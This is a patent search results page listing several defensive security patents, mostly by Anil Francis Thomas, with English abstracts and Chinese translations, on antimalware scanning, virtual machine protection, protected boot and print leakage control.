利索-全球专利检索

  1. 登录
  2. 注册

搜索结果

28 条记录 (耗时 0.03 秒)

    Antimalware Protection of Virtual Machines
    1.
    发明申请
    Antimalware Protection of Virtual Machines 审中-公开
    虚拟机的反恶意软件保护

    公开(公告)号:US20120144489A1

    公开(公告)日:2012-06-07

    申请号:US12961854

    申请日:2010-12-07

    申请人: Michael Sean Jarrett Joseph Jared Johnson Vishal Kapoor Anil Francis Thomas Eugene John Neystadt Dennis Scott Batchelder

    发明人: Michael Sean Jarrett Joseph Jared Johnson Vishal Kapoor Anil Francis Thomas Eugene John Neystadt Dennis Scott Batchelder

    IPC分类号: G06F21/00

    CPC分类号: G06F21/566 G06F9/45558 G06F21/568 G06F2009/45587

    摘要: The subject disclosure is directed towards protecting virtual machines on guest partitions from malware in a resource-efficient manner. Antimalware software is divided into lightweight agents that run on each malware-protected guest partition, a shared scanning and signature update mechanism, and a management component. Each agent provides the scanning mechanism with files to scan for malware, such as by running a script, and receives results from the scanning mechanism including possible remediation actions to perform. The management component provides the scanning mechanism with access to virtual machine services, such as to pause, resume, snapshot and rollback guest partitions as requested by the scanning mechanism.

    摘要翻译: 主题公开旨在以资源有效的方式保护来宾分区上的虚拟机与恶意软件。 反恶意软件分为在每个受恶意软件保护的客户机分区,共享扫描和签名更新机制以及管理组件上运行的轻量级代理。 每个代理为扫描机构提供扫描恶意软件的文件,例如通过运行脚本,并从扫描机制接收结果,包括可执行的修复操作。 管理组件为扫描机制提供了访问虚拟机服务的扫描机制,例如按照扫描机制的要求暂停,恢复,快照和回滚客户机分区。

    Malware Detection Using Code Analysis and Behavior Monitoring
    4.
    发明申请
    Malware Detection Using Code Analysis and Behavior Monitoring 审中-公开
    恶意软件检测使用代码分析和行为监控

    公开(公告)号:US20100031353A1

    公开(公告)日:2010-02-04

    申请号:US12025694

    申请日:2008-02-04

    申请人: Anil Francis Thomas George Cristian Chicioreanu Adrian Mihail Marinescu

    发明人: Anil Francis Thomas George Cristian Chicioreanu Adrian Mihail Marinescu

    IPC分类号: G06F11/00

    CPC分类号: G06F11/3604 G06F21/563 G06F21/566

    摘要: Aspects of the subject matter described herein relate to malware detection using code analysis and behavior monitoring. In aspects, an anti-malware engine performs static analysis on program code and monitors behavior of the program code that is exhibited when the program code executes in a virtual and/or non-virtual environment. The anti-malware engine combines the results of both types of malware detection to determine whether the program code includes malware. The anti-malware engine may use feedback from one or more of the malware detection mechanism to direct additional malware detection (e.g., static and/or behavior detection) for the program code.

    摘要翻译: 本文描述的主题的方面涉及使用代码分析和行为监控的恶意软件检测。 在这方面,反恶意软件引擎对程序代码执行静态分析,并监视在虚拟和/或非虚拟环境中执行程序代码时所展现的程序代码的行为。 反恶意软件引擎结合了两种类型的恶意软件检测结果,以确定程序代码是否包括恶意软件。 反恶意软件引擎可以使用来自一个或多个恶意软件检测机制的反馈来引导用于程序代码的附加恶意软件检测(例如,静态和/或行为检测)。

    System and method of allowing user mode applications with access to file data
    5.
    发明授权
    System and method of allowing user mode applications with access to file data 有权
    允许用户模式应用访问文件数据的系统和方法

    公开(公告)号:US07478237B2

    公开(公告)日:2009-01-13

    申请号:US10984207

    申请日:2004-11-08

    申请人: Mihai Costea David Allen Goebel Adrian M Marinescu Anil Francis Thomas

    发明人: Mihai Costea David Allen Goebel Adrian M Marinescu Anil Francis Thomas

    IPC分类号: H04L9/00 H04L9/32 G06F11/30

    CPC分类号: G06F21/566 G06F21/564

    摘要: In accordance with this invention, a system, method, and computer-readable medium that aggregates the knowledge base of a plurality of antivirus software applications are provided. User mode applications, such as antivirus software applications, gain access to file system operations through a common information model, which obviates the need for antivirus software vendors to create kernel mode filters. When file system operations are available to antivirus software applications, the present invention may cause each antivirus software application installed on a computing device to perform a scan to determine if the data is malware.

    摘要翻译: 根据本发明,提供了聚合多个防病毒软件应用的知识库的系统,方法和计算机可读介质。 诸如防病毒软件应用程序之类的用户模式应用程序通过通用信息模型获得对文件系统操作的访问,从而避免了防病毒软件供应商创建内核模式过滤器的需要。 当文件系统操作可用于防病毒软件应用时,本发明可以使得安装在计算设备上的每个防病毒软件应用程序执行扫描以确定数据是否是恶意软件。

    Protecting user mode processes from improper tampering or termination
    6.
    发明授权
    Protecting user mode processes from improper tampering or termination 有权
    保护用户模式进程免受不正当的篡改或终止

    公开(公告)号:US08621628B2

    公开(公告)日:2013-12-31

    申请号:US12713151

    申请日:2010-02-25

    申请人: Eli Zeitlin Arnon Axelrod Anil Francis Thomas Kanwaljit Marok

    发明人: Eli Zeitlin Arnon Axelrod Anil Francis Thomas Kanwaljit Marok

    IPC分类号: G06F21/00

    CPC分类号: G06F21/566 G06F21/554 G06F21/56

    摘要: In one embodiment, a malware protection system may protect a computing system from a malware event. A data storage device 150 may store a watchdog filter driver 240 integrated with an operating system kernel 210. A processor 120 may intercept a process access to an application process 220 with the watchdog filter driver 240 to detect a malware event. The processor 120 may use the watchdog filter driver 240 to determine an originating process for the malware event.

    摘要翻译: 在一个实施例中,恶意软件保护系统可以保护计算系统免受恶意软件事件的影响。 数据存储设备150可以存储与操作系统内核210集成的看门狗滤波器驱动器240.处理器120可以用看门狗滤波器驱动器240拦截对应用进程220的进程访问以检测恶意软件事件。 处理器120可以使用看门狗滤波器驱动器240来确定恶意软件事件的发起过程。

    DEVICE BOOTING WITH AN INITIAL PROTECTION COMPONENT
    7.
    发明申请
    DEVICE BOOTING WITH AN INITIAL PROTECTION COMPONENT 有权
    具有初始保护组件的设备启动

    公开(公告)号:US20110307711A1

    公开(公告)日:2011-12-15

    申请号:US12813955

    申请日:2010-06-11

    申请人: Mark F. Novak Robert Karl Spiger Stefan Thom David J. Linsley Scott A. Field Anil Francis Thomas

    发明人: Mark F. Novak Robert Karl Spiger Stefan Thom David J. Linsley Scott A. Field Anil Francis Thomas

    IPC分类号: G06F21/00 G06F12/14 G06F15/177

    CPC分类号: G06F21/575

    摘要: Booting a computing device includes executing one or more firmware components followed by a boot loader component. A protection component for the computing device, such as an anti-malware program, is identified and executed as an initial component after executing the boot loader component. One or more boot components are also executed, these one or more boot components including only boot components that have been approved by the protection component. A list of boot components that have been previously approved by the protection component can also be maintained in a tamper-proof manner.

    摘要翻译: 启动计算设备包括执行一个或多个固件组件,后跟引导加载程序组件。 在执行引导加载程序组件之后,识别并执行诸如反恶意软件程序之类的计算设备的保护组件作为初始组件。 还执行一个或多个引导组件,这些一个或多个引导组件仅包括被保护组件批准的引导组件。 先前已被保护组件批准的引导组件列表也可以以防篡改的方式进行维护。

    System and method for efficiently scanning a file for malware
    8.
    发明授权
    System and method for efficiently scanning a file for malware 有权
    用于高效扫描恶意软件文件的系统和方法

    公开(公告)号:US07861296B2

    公开(公告)日:2010-12-28

    申请号:US11154267

    申请日:2005-06-16

    申请人: Mihai Costea Adrian Bivol Adrian M. Marinescu Anil Francis Thomas Cenk Ergan David Goebel George C. Chicioreanu Marius Gheorghe Gheorghescu Michael R. Fortin

    发明人: Mihai Costea Adrian Bivol Adrian M. Marinescu Anil Francis Thomas Cenk Ergan David Goebel George C. Chicioreanu Marius Gheorghe Gheorghescu Michael R. Fortin

    IPC分类号: G06F11/00

    CPC分类号: G06F21/51 G06F21/566

    摘要: The present invention is directed toward a system, method, and a computer-readable medium for efficiently loading data into memory in order to scan the data for malware. The logic provided in the present invention improves the experience of a user when operating a computer protected with antivirus software. One aspect of the present invention is a method that identifies a pattern in which data in a file is loaded into memory from a computer-readable medium. Then the method identifies a pattern in which data in the file may be loaded into memory in a way that minimizes the time required to read data in the file. When a subsequent scan of the file is scheduled to occur, the method causes data in the file to be loaded in memory using the pattern that minimizes the time required to read data in the file.

    摘要翻译: 本发明涉及一种用于将数据有效地加载到存储器中以便扫描恶意软件的数据的系统,方法和计算机可读介质。 本发明提供的逻辑提高了用户在操作受防病毒软件保护的计算机时的体验。 本发明的一个方面是从计算机可读介质中识别文件中的数据被加载到存储器中的模式的方法。 然后,该方法识别可以以最小化在文件中读取数据所需的时间的方式将文件中的数据加载到存储器中的模式。 当调度文件的后续扫描时,该方法会使文件中的数据使用最小化文件中读取数据所需的时间的模式加载到内存中。

    Controlling Sensitive Information Leakage in Printing
    9.
    发明申请
    Controlling Sensitive Information Leakage in Printing 审中-公开
    控制印刷中的敏感信息泄漏

    公开(公告)号:US20100060925A1

    公开(公告)日:2010-03-11

    申请号:US12206749

    申请日:2008-09-09

    申请人: Anil Francis Thomas

    发明人: Anil Francis Thomas

    IPC分类号: G06F3/12

    CPC分类号: G06F21/608 G06F3/1296

    摘要: Aspects of the subject matter described herein relate to controlling sensitive information leakage in printing. In aspects, one or more interception units sit in the print path(s) of a device. The interception unit(s) receives print data that is generated on the device and extract information from the print data. The extracted information is used to determine whether the print data include sensitive information. If the print data includes sensitive information, a policy is applied and the print data may or may not be forwarded towards a printer. Otherwise, the print data is forwarded towards a printer without applying a policy.

    摘要翻译: 本文描述的主题的方面涉及在打印中控制敏感信息泄漏。 在方面中,一个或多个拦截单元位于设备的打印路径中。 截取单元接收在设备上生成的打印数据,并从打印数据中提取信息。 所提取的信息用于确定打印数据是否包括敏感信息。 如果打印数据包括敏感信息,则应用策略,并且打印数据可能被转发或者不被转发到打印机。 否则,打印数据将转发给打印机而不应用策略。

    Applying Antimalware Logic without Revealing the Antimalware Logic to Adversaries
    10.
    发明申请
    Applying Antimalware Logic without Revealing the Antimalware Logic to Adversaries 有权
    应用反恶意软件逻辑,而不会向对手揭示反恶意软件逻辑

    公开(公告)号:US20120317644A1

    公开(公告)日:2012-12-13

    申请号:US13156726

    申请日:2011-06-09

    申请人: Ajith Kumar Timothy Jon Fraser Adrian M. Marinescu Marc E. Seinfeld Jack Wilson Stokes, III Anil Francis Thomas

    发明人: Ajith Kumar Timothy Jon Fraser Adrian M. Marinescu Marc E. Seinfeld Jack Wilson Stokes, III Anil Francis Thomas

    IPC分类号: G06F21/00

    CPC分类号: G06F21/552 G06F21/566

    摘要: The subject disclosure is directed towards a technology by which antimalware detection logic is maintained and operated at a backend service, with which a customer frontend machine communicates (queries) for purposes of malware detection. In this way, some antimalware techniques are maintained at the backend service rather than revealed to antimalware authors. The backend antimalware detection logic may be based upon feature selection, and may be updated rapidly, in a manner that is faster than malware authors can track. Noise may be added to the results to make it difficult for malware authors to deduce the logic behind the results. The backend may return results indicating malware or not malware, or return inconclusive results. The backend service may also detect probing-related queries that are part of an attempt to deduce the unrevealed antimalware detection logic, with noisy results returned in response and/or other actions taken to foil the attempt.

    摘要翻译: 主题公开涉及一种技术,通过该技术,反恶意软件检测逻辑在后端服务中被维护和操作,客户前端机器为此进行通信(查询)以用于恶意软件检测。 这样一来,后端服务就会保留一些反恶意软件技术,而不是反恶意软件作者。 后端反恶意软件检测逻辑可以基于特征选择,并且可以以比作者可追踪的恶意软件更快的方式快速更新。 噪声可能会添加到结果中,使恶意软件作者难以推断出结果背后的逻辑。 后端可能返回指示恶意软件或不是恶意软件的结果,或返回不确定的结果。 后端服务还可以检测作为尝试推断出未显示的反恶意软件检测逻辑的一部分的探测相关查询,其响应返回的噪声结果和/或为了抵制尝试而采取的其他动作。